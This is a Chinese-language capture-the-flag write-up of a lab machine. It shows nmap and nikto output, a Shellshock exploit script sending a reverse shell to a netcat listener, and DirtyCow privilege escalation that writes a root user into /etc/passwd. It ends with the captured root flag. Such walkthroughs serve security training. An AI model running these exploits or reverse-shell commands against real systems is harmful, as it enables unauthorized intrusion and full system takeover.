主要知识点

• ShellShock漏洞
• dirtycow提权

具体步骤

执行nmap扫描,比较直观，22和80端口开放，但是80端口没有什么内容

Nmap scan report for 192.168.210.87
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

 

于是我们执行一下nikto,发现了应该是由shellshock漏洞，于是搜索一下
 

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.210.87
+ Target Hostname:    192.168.210.87
+ Target Port:        80
+ Proxy:              127.0.0.1:7890
+ Start Time:         2024-12-01 18:59:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Server may leak inodes via ETags, header found with file /, inode: 1706318, size: 177, mtime: Tue May 12 01:55:10 2020. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS (May be proxy's methods, not server's).
+ /cgi-bin/test: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /cgi-bin/test.sh: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /cgi-bin/test/test.cgi: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/

在尝试了几个exp之后， 找到了一个好用的GitHub - b4keSn4ke/CVE-2014-6271: Shellshock exploit aka CVE-2014-6271

在本地启动了nc -nlvp 80后 执行exp脚本

python shellshock.py  192.168.45.175 80 http://192.168.210.87/cgi-bin/test/test.cgi

反弹shell会被创建，在当前目录下也可以直接获取到第一个flag

C:\home\kali\Documents\OFFSEC\play\Sumo\CVE-2014-6271-main> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.175] from (UNKNOWN) [192.168.210.87] 41410
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

上传Linpeas.sh后并执行，发现了有dirtycow漏洞，

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]Download URL: https://www.exploit-db.com/download/40611Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-5195] dirtycow 2Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}Download URL: https://www.exploit-db.com/download/40839ext-url: https://www.exploit-db.com/download/40847Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

于是在PoCs · dirtycow/dirtycow.github.io Wiki · GitHub找一个比较靠谱的，我选择了dirty.c

在本地编译后并上传运行后成功得到root权限

./dirty
Please enter the new password: 1234
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bashmmap: 7f71283b4000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bashmmap: 7f71283b4000
madvise 0Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
su firefart
su: must be run from a terminal
whereis python
python: /usr/bin/python /usr/bin/python2.7 /etc/python /etc/python2.7 /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/tmp$ su firefart
su firefart
Password: 1234firefart@ubuntu:/tmp# cat /root/proof.txt
cat /root/proof.txt
8884c95d2ff482989a8138a6b75c136c
firefart@ubuntu:/tmp#